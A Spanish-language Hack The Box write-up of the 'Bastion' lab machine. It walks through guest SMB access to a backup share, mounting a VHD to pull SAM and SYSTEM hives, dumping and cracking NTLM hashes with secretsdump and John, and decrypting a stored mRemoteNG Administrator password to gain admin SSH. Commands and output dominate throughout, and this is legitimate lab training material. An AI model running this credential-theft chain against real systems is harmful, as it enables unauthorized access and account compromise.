Bastion
Dificultad: Easy - OS: Windows
Enumeración de puertos/servicios
┌──(root㉿kali)-[/home/kali/Documents/HTB]
└─# nmap -sCV --open -T4 -v -n 10.10.10.134Resultado:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-27T06:13:39
|_ start_date: 2025-04-27T05:18:29
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-04-27T08:13:41+02:00
|_clock-skew: mean: -38m36s, deviation: 1h09m14s, median: 1m21s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)Los puertos que nos interesan:
Puerto | Estado | Servicio | Protocolo
22/tcp | open | ssh (OpenSSH 7.9) | TCP
139/tcp | open | netbios-ssn | TCP
445/tcp | open | Microsoft-DS | TCPEnumeración de recursos SMB
Esta vez usaremos la tool nxc para ver si tenemos permisos de escritura o lectura en la unidad compartida.
┌──(root㉿kali)-[/home/kali/Documents/HTB]
└─# nxc smb 10.10.10.134 -u 'a' -p '' --shares
SMB 10.10.10.134 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB 10.10.10.134 445 BASTION [+] Bastion\a: (Guest)
SMB 10.10.10.134 445 BASTION [*] Enumerated shares
SMB 10.10.10.134 445 BASTION Share Permissions Remark
SMB 10.10.10.134 445 BASTION ----- ----------- ------
SMB 10.10.10.134 445 BASTION ADMIN$ Remote Admin
SMB 10.10.10.134 445 BASTION Backups READ,WRITE
SMB 10.10.10.134 445 BASTION C$ Default share
SMB 10.10.10.134 445 BASTION IPC$ Remote IPCIdentificación de archivos de respaldo
El recurso que no interesa ver es el Backups. Vamos a usar smbclient para navegar entre el contenido de este directorio y buscar información o recursos sensibles.
┌──(root㉿kali)-[/home/kali/Documents/HTB]
└─# smbclient //10.10.10.134/backups -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Apr 16 06:02:11 2019
.. D 0 Tue Apr 16 06:02:11 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
5638911 blocks of size 4096. 1178907 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> cat note.txt
cat: command not found
smb: \> !cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> dir
. Dn 0 Fri Feb 22 07:44:02 2019
.. Dn 0 Fri Feb 22 07:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1177973 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> dir
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
Backup 2019-02-22 124351 Dn 0 Fri Feb 22 07:45:32 2019
Catalog Dn 0 Fri Feb 22 07:45:32 2019
MediaId An 16 Fri Feb 22 07:44:02 2019
SPPMetadataCache Dn 0 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1177931 blocks available
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 07:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 07:45:32 2019
BackupSpecs.xml An 1186 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1173840 blocks availableMontaje y análisis del VHD
Otra forma más ordenada de ver el contenido del directorio /Backups es montando el disco en nuestro equipo de la siguiente manera:
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# mkdir smb_shares_backup
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# mount -t cifs //10.10.10.134/Backups ./smb_shares_backup -o rw -o username=guest
Password for guest@//10.10.10.134/Backups:
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# tree -ha smb_shares_backup
[4.0K] smb_shares_backup
├── [ 0] cyiWwVfZQB
├── [ 0] FlpNkybTvX.txt
├── [ 0] HXZiyDARPb
├── [ 116] note.txt
├── [ 0] SDT65CB.tmp
├── [ 0] WFCBUztHSM.txt
└── [ 0] WindowsImageBackup
└── [ 0] L4mpje-PC
├── [ 0] Backup 2019-02-22 124351
│  ├── [ 36M] 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
│  ├── [5.0G] 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
│  ├── [1.2K] BackupSpecs.xml
│  ├── [1.1K] cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
│  ├── [8.7K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
│  ├── [6.4K] cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
│  ├── [2.8K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
│  ├── [1.5K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
│  ├── [1.4K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
│  ├── [3.8K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
│  ├── [3.9K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
│  ├── [6.9K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
│  └── [2.3M] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
├── [ 0] Catalog
│  ├── [5.6K] BackupGlobalCatalog
│  └── [7.3K] GlobalCatalog
├── [ 16] MediaId
└── [ 0] SPPMetadataCache
└── [ 56K] {cd113385-65ff-4ea2-8ced-5630f6feca8f}
8 directories, 21 files ¿Que nos interesa realmente acá?
La carpeta Backup 2019-02-22 124351:
→ Dentro de esta carpeta es donde suelen estar los archivos VHD o VHDX, que son discos virtuales.
→ Estos VHD contienen copias completas de particiones o volúmenes del sistema del que se hizo backup.
El vhd que nos interesa es el [5.0G] 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
De aca podremos extraer archivos crÃticos, como:
El SAM (
Security Account Manager) para robar hashes de contraseñas.El archivo SYSTEM, necesario para desencriptar esos hashes.
Ahora para poder montar el VHD en nuestra máquina vamos a usar el siguiente comando:
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# mkdir backup
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# guestmount -a /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /home/kali/Documents/HTB/BASTION/backupExtracción de archivos SAM y SYSTEM
Al listar el contenido, vemos que tenemos acceso a los directorios correspondientes al backup de un sistema, y que estamos ubicados en la raÃz de la partición C:/. Ahora, para no perdernos entre todos los ficheros del sistema, vamos a ir directamente a buscar los hashes de las contraseñas NTLM que Windows almacena normalmente. Como en este caso contamos con el backup, podemos leer estos archivos sin restricciones. Por esta razón, vamos a ir directamente al directorio Windows/System32/config, donde se almacenan los archivos SAM, SYSTEM y SECURITY, que son cruciales para la autenticación y la seguridad del sistema.
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# ls -la backup
total 2096745
drwxrwxrwx 1 root root 12288 Feb 22 2019 .
drwxr-xr-x 4 root root 4096 Apr 27 21:26 ..
drwxrwxrwx 1 root root 0 Feb 22 2019 '$Recycle.Bin'
-rwxrwxrwx 1 root root 24 Jun 10 2009 autoexec.bat
-rwxrwxrwx 1 root root 10 Jun 10 2009 config.sys
lrwxrwxrwx 2 root root 14 Jul 14 2009 'Documents and Settings' -> /sysroot/Users
-rwxrwxrwx 1 root root 2147016704 Feb 22 2019 pagefile.sys
drwxrwxrwx 1 root root 0 Jul 13 2009 PerfLogs
drwxrwxrwx 1 root root 4096 Jul 14 2009 ProgramData
drwxrwxrwx 1 root root 4096 Apr 11 2011 'Program Files'
drwxrwxrwx 1 root root 0 Feb 22 2019 Recovery
drwxrwxrwx 1 root root 4096 Feb 22 2019 'System Volume Information'
drwxrwxrwx 1 root root 4096 Feb 22 2019 Users
drwxrwxrwx 1 root root 16384 Feb 22 2019 Windows
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# cd backup/Windows/System32/config
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# ls -la SAM
-rwxrwxrwx 1 root root 262144 Feb 22 2019 SAM
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# ls -la SYSTEM
-rwxrwxrwx 1 root root 9699328 Feb 22 2019 SYSTEM
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# ls -la SECURITY
-rwxrwxrwx 1 root root 262144 Feb 22 2019 SECURITYEntonces lo que vamos a hacer es lo siguiente:
Creamos un directorio en nuestra máquina local donde copiaremos los ficheros SAM, SYSTEM y SECURITY respectivamente
Una vez copiado estos ficheros nos moveremos hacia esa carpeta (en mi caso
windowsconf) y usaremos la tool impacket-secretsdump para dumpear los hashes NTLMv2 y copiaremos esos hashes en un archivo .txt (en mi caso hashes.txt)Una vez que obtengamos los hashes vamos a crackearlos con johntheripper usando el diccionario rockyou.txt y pasandole el archivo donde los guardamos (hashes.txt).
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# mkdir /home/kali/Documents/HTB/BASTION/windowsconf
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# cp SAM /home/kali/Documents/HTB/BASTION/windowsconf
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# cp SYSTEM /home/kali/Documents/HTB/BASTION/windowsconf
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# cp SECURITY /home/kali/Documents/HTB/BASTION/windowsconf Extracción y crackeo de hashes
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# cd /home/kali/Documents/HTB/BASTION/windowsconf
┌──(root㉿kali)-[/home/…/Documents/HTB/BASTION/windowsconf]
└─# ls
SAM SECURITY SYSTEM
┌──(root㉿kali)-[/home/…/Documents/HTB/BASTION/windowsconf]
└─# impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...
┌──(root㉿kali)-[/home/…/Documents/HTB/BASTION/windowsconf]
└─# nano hashes.txt ┌──(root㉿kali)-[/home/…/Documents/HTB/BASTION/windowsconf]
└─# john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
bureaulampje (L4mpje)
2g 0:00:00:00 DONE (2025-04-27 22:59) 4.255g/s 19990Kp/s 19990Kc/s 20000KC/s burg772v..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.Acceso inicial al sistema y Enumeración de software instalado
Y de esta forma logramos obtener una credencial que nos servirá para conectarnos al puerto 22 por ssh. Una vez que tenemos acceso al sistema podemos intentar muchas cosas como enumerar permisos de usuario, listar o identificar ficheros especÃficos, pero para esta máquina nos va a ser de utilidad enumerar las aplicaciones que están instaladas y para lograr esto vamos a utilizar los siguientes comandos invocando powershell:
l4mpje@BASTION C:\>dir '.\Program Files (x86)\'
The system cannot find the file specified.
l4mpje@BASTION C:\>powershell -Command "ls '.\Program Files (x86)\'"
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 16-7-2016 15:23 Common Files
d----- 23-2-2019 09:38 Internet Explorer
d----- 16-7-2016 15:23 Microsoft.NET
da---- 22-2-2019 14:01 mRemoteNG
d----- 23-2-2019 10:22 Windows Defender
d----- 23-2-2019 09:38 Windows Mail
d----- 23-2-2019 10:22 Windows Media Player
d----- 16-7-2016 15:23 Windows Multimedia Platform
d----- 16-7-2016 15:23 Windows NT
d----- 23-2-2019 10:22 Windows Photo Viewer
d----- 16-7-2016 15:23 Windows Portable Devices
d----- 16-7-2016 15:23 WindowsPowerShell l4mpje@BASTION C:\>powershell -Command "Get-ItemProperty 'HKLM:\SOFTWARE\Wow6432Node\Microsof
t\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName"
DisplayName
-----------
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.24.28127
mRemoteNG
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.24.28127
l4mpje@BASTION C:\>powershell -Command "Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\Cu
rrentVersion\Uninstall\*' | Select-Object DisplayName"
DisplayName
-----------
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
VMware Tools
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.24.28127
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.24.28127 Extracción de credenciales desde mRemoteNG
Encontramos la herramienta mRemoteNG. Con esta aplicación podemos buscar credenciales que se encuentren expuestas en sus archivos de configuración.
l4mpje@BASTION C:\>dir %APPDATA%\mRemoteNG\
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG
22-02-2019 15:03 <DIR> .
22-02-2019 15:03 <DIR> ..
22-02-2019 15:03 6.316 confCons.xml
22-02-2019 15:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 15:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 15:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 15:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 15:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 15:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 15:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 15:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 15:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 15:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 15:03 51 extApps.xml
22-02-2019 15:03 5.217 mRemoteNG.log
22-02-2019 15:03 2.245 pnlLayout.xml
22-02-2019 15:01 <DIR> Themes
14 File(s) 76.577 bytes
3 Dir(s) 4.806.193.152 bytes free Vemos muchos ficheros confCons.xml, pero vamos a leer el que no es un backup
l4mpje@BASTION C:\>type \Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" Encrypt
ionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protect
ed="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA"
ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-
662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17
QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" P
rotocol="RDP" [.......] InheritRDGatewayUseConnectionCredentials="false" InheritR
DGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections> Encontramos las credenciales del Administrator, ahora solo hay que crackearlas para usar su conexión ssh. Para este caso vamos a usar la tool mremoteng_decrypt.py que crackea especificamente este tipo de cifrados:
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# wget https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/refs/heads/master/mremoteng_decrypt.py
--2025-04-28 01:33:47-- https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/refs/heads/master/mremoteng_decrypt.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1535 (1.5K) [text/plain]
Saving to: ‘mremoteng_decrypt.py’
mremoteng_decrypt.py 100%[============================>] 1.50K --.-KB/s in 0s
2025-04-28 01:33:47 (11.2 MB/s) - ‘mremoteng_decrypt.py’ saved [1535/1535]
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# ls
backup mremoteng_decrypt.py smb_shares_backup windowsconf
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2Acceso como administrador
Ahora nos conectamos y buscamos las flags ( ͡° ͜ʖ ͡°)
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# ssh Administrator@10.10.10.134 -o StrictHostKeyChecking=no
Administrator@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>type \Users\Administrator\Desktop\root.txt
d8419a**************************
administrator@BASTION C:\Users\Administrator>type \Users\L4mpje\Desktop\user.txt
d3f88e**************************Last updated